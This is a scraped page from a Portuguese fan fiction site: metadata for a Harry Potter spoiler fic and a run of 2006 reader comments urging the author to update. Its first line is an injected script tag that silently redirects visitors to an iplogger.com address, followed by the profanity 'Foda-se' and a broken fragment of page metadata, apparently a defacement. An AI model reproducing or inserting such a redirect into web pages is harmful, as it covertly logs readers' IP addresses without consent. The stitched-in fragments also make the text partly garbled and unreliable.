<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
Perfeito!!! ei kd a continuaçao? deixa de misterio e ATUALIZA,ATUALIZA,ATUALIZA....
2006-07-04Eu tô morrendo de curiosidade para saber como será o desfecho da sua FanFic....... Atualizaaaaaaaa!!!!!!!!!!!!!!!!!!!!!!!!!1
2006-07-04porque a sônia sempre faz isso com a gente? um capítulozinho e ja ficamos felizes novamente!
2006-07-04Sônia kd vc?! Por favor atualiza a fic, estamos desesperados por esse final !!! Já li e reli a fic enquanto espero... daqui a pouco "sei de có"... Please, não nos mate de ansiedade !!! Um super beijo !
2006-07-03Aiiii meu Deussss agora fiquei curiosaaa....acabei de le agora o capitulo 34.....e eu so digo uma coisa ATUALIZAAAAAA....vai ser uma tortura esperar muito pelo final dessa fic taum maravilhosaaaaaa!!!!Eu amei muito elaaaaa!!!E corrigindo um grandee erro q essi site cometeuuu essa fic naum eh soh nota 5........eh nota 100000000000000000000000000000000000000000000............podi te certezaaaa!!!! Bjossssssssss!!!
2006-07-03*cry* Atualiza
2006-07-03Ai meu merlin isso é maldade com os leitores, eu vou ter um ataque do coração. Eu prometi pra mim mesma(a pedido seu) q eu naum ia t escrevar isso mas naum da naum consigo ATUALIZAAAAAAAAAAA.bjinhos muito boa a fic nota 1.000
2006-07-02UAUUUUUUUUUU_________Nossa______Amei. Precisa dezer mais? Lê a minha também, vai? Da uma prestigiada.______[]s+{}s
2006-07-01mestraaaaaaaa!!!!! Eu.... não... consigo... respirar....eu preciso lerrrrr a sua fic.... beijokas
2006-06-30Eu amei a sua fic....ainda não acabei de ler....mais ela me vicio!!!Hhehehhe!!!Foi a a melhor qu eu ja li até hoje!!!!!!!Você ta de parabens!!!!Bjosss!!!
2006-06-30